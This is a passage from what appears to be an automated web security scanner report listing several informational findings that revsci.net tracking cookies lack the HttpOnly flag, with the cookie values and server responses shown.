if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.165. http://pix04.revsci.net/I10985/b3/0/3/1008211/178674175.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/178674175.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwXolocE02QQ4O3XYcv0liHtqFncA2iMgL2Isw+1QGSyspZz4WDbWjIKteif4fOffjX8iq0xsqPPwv6rrUdcIwSmkFGWlAUMTmYjtIJpyfP4P6/Ql+5VXlxUvEZyBSFKUS4KkscCmnNeYCSMGrDrUf+BvgDGGbJFLjv17SZArUcRrC7uZVBYf4XW1pSfuKp6homnlrYgI1lp22zIsyNkdhnNKrDXFyf2BIJjwRtF66AS5NH6WeHi66QiBAbzuCfcTOvbS7pGUjONH+30I2ZuPpFFcJfLwMGBPKQaQeWilp3IbaUy4YHwwCQ54z6HyEJjii4lNh+z72sqS8+sc4nxiV6/ef0ICmGx5g7xCy4pMdlCvlXW9zmpmAaRe4AnwFVp3janDXi1hx/1AwyItq6cJ/DahrGn/8I2DqZtPPL4L8ZvJCkkBlSEPLmp8X89FhkTc3FX0EkoMV5wb2GKZrUAz9ZSnPla73H20hG6GDVAIlzGqD+HVKrdZtLEidm93t8ba3/QY0qP1/RHB/bhABQqsC6PjuYiHsXCMVouXiWpLwAJncCH8Zz+R5sVSYoe/Ie4GnZHI4uL0HiW7q7XNODWxC8Rkr+FiCdZrx2A7gJRW8ynaYBSuVYj/QxeB+f04; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:48:13 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwXolocE02QQ4O3XYcv0liHtqFncA2iMgL2Isw+1QGSyspZz4WDbWjIKteif4fOffjX8iq0xsqPPwv6rrUdcIwSmkFGWlAUMTmYjtIJpyfP4P6/Ql+5VXlxUvEZyBSFKUS4KkscCmnNeYCSMGrDrUf+BvgDGGbJFLjv17SZArUcRrC7uZVBYf4XW1pSfuKp6homnlrYgI1lp22zIsyNkdhnNKrDXFyf2BIJjwRtF66AS5NH6WeHi66QiBAbzuCfcTOvbS7pGUjONH+30I2ZuPpFFcJfLwMGBPKQaQeWilp3IbaUy4YHwwCQ54z6HyEJjii4lNh+z72sqS8+sc4nxiV6/ef0ICmGx5g7xCy4pMdlCvlXW9zmpmAaRe4AnwFVp3janDXi1hx/1AwyItq6cJ/DahrGn/8I2DqZtPPL4L8ZvJCkkBlSEPLmp8X89FhkTc3FX0EkoMV5wb2GKZrUAz9ZSnPla73H20hG6GDVAIlzGqD+HVKrdZtLEidm93t8ba3/QY0qP1/RHB/bhABQqsC6PjuYiHsXCMVouXiWpLwAJncCH8Zz+R5sVSYoe/Ie4GnZHI4uL0HiW7q7XNODWxC8Rkr+FiCdZrx2A7gJRW8ynaYBSuVYj/QxeB+f04; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:48:13 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 13:48:12 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.166. http://pix04.revsci.net/I10985/b3/0/3/1008211/204994515.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/204994515.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfqkHGdHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU6SSkHFIHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoErccRrS7uZVBYf4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyV2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcJfLwMN3eawf2+KLTThx0xTTlYHzawZQXdaHyUF1KXZ8qnxnNHqGrp84hH/bhN0xQOOlD7YTKMTz5jLRWbQcdYbDr7Hjqv0yExhy1fy3n104B0a6KC4V5fwl/ueW59kACHLWrA+OydZDjZS9CIFnDETNjcdmwWlQPRzO+JjeN8UHPBRTjLTQMJBSE/72npdUNpRoMWq+9zSsWL2ZvvxerT0Qs8VVocrz8zYDPirBQcdZhw+eLiA+vKf8IaWxJPZ0zUN9NtGZU45BtmrY1IhSHSQw8NLNwnCnp3GjAE5o+URhAE83doE5n/Jh7rUvLssOKNIl0z9NOW8n0Io1Z0J+sMQ+tZ6lcs2ixNNQ=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 15:10:53 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfqkHGdHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU6SSkHFIHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoErccRrS7uZVBYf4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyV2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcJfLwMN3eawf2+KLTThx0xTTlYHzawZQXdaHyUF1KXZ8qnxnNHqGrp84hH/bhN0xQOOlD7YTKMTz5jLRWbQcdYbDr7Hjqv0yExhy1fy3n104B0a6KC4V5fwl/ueW59kACHLWrA+OydZDjZS9CIFnDETNjcdmwWlQPRzO+JjeN8UHPBRTjLTQMJBSE/72npdUNpRoMWq+9zSsWL2ZvvxerT0Qs8VVocrz8zYDPirBQcdZhw+eLiA+vKf8IaWxJPZ0zUN9NtGZU45BtmrY1IhSHSQw8NLNwnCnp3GjAE5o+URhAE83doE5n/Jh7rUvLssOKNIl0z9NOW8n0Io1Z0J+sMQ+tZ6lcs2ixNNQ=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 15:10:53 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 15:10:52 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.167. http://pix04.revsci.net/I10985/b3/0/3/1008211/20510025.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/20510025.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfqkHGdHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU6SSkHFIHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoErccRrS7uZVBYf4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyV2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcJfLwMN3eawf2+KLTThx0xTTlYHzawZQXdaHyUF1KXX9ZUQI1rnykVwY0b8NIDFThSHpzPg/1KsPTtEbccXni5KjMfY2uitH8+9UVMO+wju4WEeuZFr4ZxtKSPrxl9yaWlHQGXxBES5q3SQW4zBS05S6hScUZY7jk9D/Y8sdnlHP/5/LhztKuWrz1dEPG5Xt07bm2Mr9ewY2PdAJgSNEMnWDMpRCe+ILKfuMcbRlTlpTS3KiAJLhXLRpCtzPt0QJSAd72ueUph4qXiXpLwAJncCH8Jz+R5tVSYoe8IS4HncpOflPPhVKmF2KK5bp6xF6FD1lDLVlA11XPGBrY9ERpafwHQedYg1ZiNNk=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 14:19:13 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfqkHGdHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU6SSkHFIHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoErccRrS7uZVBYf4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyV2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcJfLwMN3eawf2+KLTThx0xTTlYHzawZQXdaHyUF1KXX9ZUQI1rnykVwY0b8NIDFThSHpzPg/1KsPTtEbccXni5KjMfY2uitH8+9UVMO+wju4WEeuZFr4ZxtKSPrxl9yaWlHQGXxBES5q3SQW4zBS05S6hScUZY7jk9D/Y8sdnlHP/5/LhztKuWrz1dEPG5Xt07bm2Mr9ewY2PdAJgSNEMnWDMpRCe+ILKfuMcbRlTlpTS3KiAJLhXLRpCtzPt0QJSAd72ueUph4qXiXpLwAJncCH8Jz+R5tVSYoe8IS4HncpOflPPhVKmF2KK5bp6xF6FD1lDLVlA11XPGBrY9ERpafwHQedYg1ZiNNk=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 14:19:13 GMT; Path=/
X-Proc-ms: 3
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 14:19:12 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.168. http://pix04.revsci.net/I10985/b3/0/3/1008211/206078584.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/206078584.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uzs22rMriQJ4Ym1N1EuC/pV+zq2jLxL9z1pFHcD2oMpIyt/lxMhiEmSOkHFIHZeBImHWKCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa0AbFjW9PtKIFHNv4PL1RUaJzrH2RPUn836DjPQ4L4Uubj0NaY9wI2qjpCay/9h6Y4N/vrTyarBrZy/5p1vkVo6HLAj5TEabu+hT6vuj41246c95NOaRAsl5hE/RAIN0jCKWeIrwU7hjL6yZdj93XkHnxuY5dXdsfw5hXREUlMqNPwkFtFYTAJwanBh5yYsGo3OuU23g4Sg+m/4oPiiW7+wP+sVJlWRijizVDRqGD+7XWyoETDu18Mfh38sGaLcBo3I8QKLVIHNbs/aPybUAp6deZ4PBam+j59FVp3j+OlK6mRTtV96HqNd0fyLSobj39hOpsGmZ9PBCS6PKnceOCU88KZYLjs9D/ogMjd3GXexqu6MMY+wrZ69abotqDqceVMfHYfc+u2rmmXQ4kjNvvzLnMiPUxpeWc6y6IrrLSU0aP1/RHBvaBGvVfQk5WA2CVlofLvT7Y9pNS4wEX/g0OMG57+HjZ94Wzt+9Or8hTS/+8rX4EUFAaGTKw1EMVr66bOxGGryE/WfC4AIQtPbpwiE6dJQwvbOys=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 16:33:34 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uzs22rMriQJ4Ym1N1EuC/pV+zq2jLxL9z1pFHcD2oMpIyt/lxMhiEmSOkHFIHZeBImHWKCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa0AbFjW9PtKIFHNv4PL1RUaJzrH2RPUn836DjPQ4L4Uubj0NaY9wI2qjpCay/9h6Y4N/vrTyarBrZy/5p1vkVo6HLAj5TEabu+hT6vuj41246c95NOaRAsl5hE/RAIN0jCKWeIrwU7hjL6yZdj93XkHnxuY5dXdsfw5hXREUlMqNPwkFtFYTAJwanBh5yYsGo3OuU23g4Sg+m/4oPiiW7+wP+sVJlWRijizVDRqGD+7XWyoETDu18Mfh38sGaLcBo3I8QKLVIHNbs/aPybUAp6deZ4PBam+j59FVp3j+OlK6mRTtV96HqNd0fyLSobj39hOpsGmZ9PBCS6PKnceOCU88KZYLjs9D/ogMjd3GXexqu6MMY+wrZ69abotqDqceVMfHYfc+u2rmmXQ4kjNvvzLnMiPUxpeWc6y6IrrLSU0aP1/RHBvaBGvVfQk5WA2CVlofLvT7Y9pNS4wEX/g0OMG57+HjZ94Wzt+9Or8hTS/+8rX4EUFAaGTKw1EMVr66bOxGGryE/WfC4AIQtPbpwiE6dJQwvbOys=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 16:33:34 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 16:33:33 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.169. http://pix04.revsci.net/I10985/b3/0/3/1008211/209054641.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/209054641.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKkIGSNrjQ0ubO+9Micc4VPat72X0BRE3fm6MNJiHGaKzb2aFbVTIYQ62RMPFHPf1Uqh8hkiOCKE0bhWe4kKQnkl16tq9preAxHphFoGataiCY4MsktlzVfsKejSNKUW1ejPcGmrIUMmJ/opLuXBEJqalRFyzz++kuS0t8FA35bmxx0VdxUYxuojQ2BuD0f+WbEpIzndJG/fogQhMe7wsnGx0ZUA1LRvIqc1ZCRGQnqo6lbb+SRPPRh/aj5ttCTYTqJZoUmIGRGDibHTk5RafHTptYvn794Rs5a/AWZGNMU4OCXav6JqC5f8352w1VO+fHAsHBzN5QM+rXeCDcD+XndQ7mVjybMVz3Xhpkr82fBvQR7L6J9TP2yJB5UGVSHaB0iP0UXysGpt8BQZJKrAXqWNdC8j5RJRevXcnOdwvsBDYngTpLHnpZcnpGu0GwY+oVizJVL3FAOJ32n+jFrveJjzca4RlI0UQepclJQX98N04vrgQEdHsQ6njPT1lzdhOVSJXxNN+bF+NI8ER6MvpozFNuNYmb09NhBEtrJKtc9WLdXNDoRYU8JuCrcaBttPw/VxiLOLeaQZKi3jv7+7jd5kgqeLc4hFM5jxgEd64JthvvboB1bYjhQ; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 15:46:59 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKkIGSNrjQ0ubO+9Micc4VPat72X0BRE3fm6MNJiHGaKzb2aFbVTIYQ62RMPFHPf1Uqh8hkiOCKE0bhWe4kKQnkl16tq9preAxHphFoGataiCY4MsktlzVfsKejSNKUW1ejPcGmrIUMmJ/opLuXBEJqalRFyzz++kuS0t8FA35bmxx0VdxUYxuojQ2BuD0f+WbEpIzndJG/fogQhMe7wsnGx0ZUA1LRvIqc1ZCRGQnqo6lbb+SRPPRh/aj5ttCTYTqJZoUmIGRGDibHTk5RafHTptYvn794Rs5a/AWZGNMU4OCXav6JqC5f8352w1VO+fHAsHBzN5QM+rXeCDcD+XndQ7mVjybMVz3Xhpkr82fBvQR7L6J9TP2yJB5UGVSHaB0iP0UXysGpt8BQZJKrAXqWNdC8j5RJRevXcnOdwvsBDYngTpLHnpZcnpGu0GwY+oVizJVL3FAOJ32n+jFrveJjzca4RlI0UQepclJQX98N04vrgQEdHsQ6njPT1lzdhOVSJXxNN+bF+NI8ER6MvpozFNuNYmb09NhBEtrJKtc9WLdXNDoRYU8JuCrcaBttPw/VxiLOLeaQZKi3jv7+7jd5kgqeLc4hFM5jxgEd64JthvvboB1bYjhQ; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 15:46:59 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 15:46:59 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.170. http://pix04.revsci.net/I10985/b3/0/3/1008211/210088310.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/210088310.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5MOhunIMpzaBv3Bh9+zs22rMriQJC32dXLnKG/pV+zq2jLxL9x1pNHcD2ocpIiv/mxMD/xw6JhTycr5wS4UUa4TNPNDPv1QWh8gkmOOsH9rraddoccklFuNdzYOTGbveI5B67GeW6vKDhf8x1zrSc6gCzrFbMIKhTTdRqoKlX/oPK//kr2kQXuR24z1Xd5Epy8Nuvh2Xbn/ZbdhDQ6jgMBVM4H5qcXSe48t8PK3WeogQhMe7wl3Gx0bUAFLRvIqc1ZCBGcncieS3sVyrE1RLjHPZUTwqJcfs27xK6WCdqQtvWy5/QZdujY05tSt9al9cxR7yLPnpwCECgSh9J3f2PSBV1F1ilMlUM/FYb2bAgdxDGVq4QKVO4SoRayrPmoaXCy+laCBm0IwcCpvZlzQmWS1JV3pld1LbO5129EmYa/TvHtTvUl6kLt48oxwSV2ajuj8clTHkylvMsWS37WmwspyTGknX1DQ0JeGvplrq7PJXM6cfBurV73XhiwlAQJRtqQQSYuSOCeSV93O9SWUbhRILfD6xrK3er59aKKo8MZRX9RNg0UPsgisu/EFFJZVo7seFL8MD3Mm3U5eTo8V9KBPj6dHnvLPv5CC7ocsFSGS7hR7hVk2HtO5Er19800fKgv7vAVmWfvKBAz/SaQg8ySDMxIHoQqQ=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 12:05:15 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5MOhunIMpzaBv3Bh9+zs22rMriQJC32dXLnKG/pV+zq2jLxL9x1pNHcD2ocpIiv/mxMD/xw6JhTycr5wS4UUa4TNPNDPv1QWh8gkmOOsH9rraddoccklFuNdzYOTGbveI5B67GeW6vKDhf8x1zrSc6gCzrFbMIKhTTdRqoKlX/oPK//kr2kQXuR24z1Xd5Epy8Nuvh2Xbn/ZbdhDQ6jgMBVM4H5qcXSe48t8PK3WeogQhMe7wl3Gx0bUAFLRvIqc1ZCBGcncieS3sVyrE1RLjHPZUTwqJcfs27xK6WCdqQtvWy5/QZdujY05tSt9al9cxR7yLPnpwCECgSh9J3f2PSBV1F1ilMlUM/FYb2bAgdxDGVq4QKVO4SoRayrPmoaXCy+laCBm0IwcCpvZlzQmWS1JV3pld1LbO5129EmYa/TvHtTvUl6kLt48oxwSV2ajuj8clTHkylvMsWS37WmwspyTGknX1DQ0JeGvplrq7PJXM6cfBurV73XhiwlAQJRtqQQSYuSOCeSV93O9SWUbhRILfD6xrK3er59aKKo8MZRX9RNg0UPsgisu/EFFJZVo7seFL8MD3Mm3U5eTo8V9KBPj6dHnvLPv5CC7ocsFSGS7hR7hVk2HtO5Er19800fKgv7vAVmWfvKBAz/SaQg8ySDMxIHoQqQ=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 12:05:15 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 12:05:14 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.171. http://pix04.revsci.net/I10985/b3/0/3/1008211/235290478.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/235290478.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwfrETCDRfrnhu4IU3vheM/Ns0vAjloMpK61ewq2/t7wxEnZxc6hXo2Tdpd3/peMQJM7SPf8uGKsMu/NnIXoCKOuMJ7ElYQvOVL9t9SMAV/7PjSKU8ZyX7SbtvP/rThYhMvIG0vXZtjIxxqeI8d5ivzt6ti+VgklbAkcGFmgFF55zOhLtGNteye5yii13Q4OdeSFKbr5jiaqKgvgvBJdkXGm510JiYUad7XLzduZCr/JxqLNImhq46QiBAaz+//8WqGERGMitWz+x0mmzhlaVCaVmYgGOu46YSaKRUQ0m04HBV+KheQbSZlO5VtneOe+StGD9+RalRkrNLXKEMvqW6SsMTBCG1D23sVtFUKOWM85Cnas1iHQaGKvNWNbdqHjM7TW4vZKHdpJ1KXdLpe1PQ72hrFn/8I2DKcTrIFCkopzHCkkdlSH/12pK3/BLhkQsrZH5FpXMV5z7hZpF/VfEDWXZ5TRm0IlbP8z1KB5y9zBus/K4s6INaHh4ssltHk7xsqAU4HQyLZuiOWyBijKhvPh+q+HMu+4V9pewc+aosfPpiUVrT5/IXE8TaK+asU5xfX/5RECzSnBWhBiMHG/JhpNGkSgZl9KYAvHyF+m4l70RCkw2yK0lsDhW; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:12:35 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwfrETCDRfrnhu4IU3vheM/Ns0vAjloMpK61ewq2/t7wxEnZxc6hXo2Tdpd3/peMQJM7SPf8uGKsMu/NnIXoCKOuMJ7ElYQvOVL9t9SMAV/7PjSKU8ZyX7SbtvP/rThYhMvIG0vXZtjIxxqeI8d5ivzt6ti+VgklbAkcGFmgFF55zOhLtGNteye5yii13Q4OdeSFKbr5jiaqKgvgvBJdkXGm510JiYUad7XLzduZCr/JxqLNImhq46QiBAaz+//8WqGERGMitWz+x0mmzhlaVCaVmYgGOu46YSaKRUQ0m04HBV+KheQbSZlO5VtneOe+StGD9+RalRkrNLXKEMvqW6SsMTBCG1D23sVtFUKOWM85Cnas1iHQaGKvNWNbdqHjM7TW4vZKHdpJ1KXdLpe1PQ72hrFn/8I2DKcTrIFCkopzHCkkdlSH/12pK3/BLhkQsrZH5FpXMV5z7hZpF/VfEDWXZ5TRm0IlbP8z1KB5y9zBus/K4s6INaHh4ssltHk7xsqAU4HQyLZuiOWyBijKhvPh+q+HMu+4V9pewc+aosfPpiUVrT5/IXE8TaK+asU5xfX/5RECzSnBWhBiMHG/JhpNGkSgZl9KYAvHyF+m4l70RCkw2yK0lsDhW; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:12:35 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 13:12:35 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.172. http://pix04.revsci.net/I10985/b3/0/3/1008211/242178359.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/242178359.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

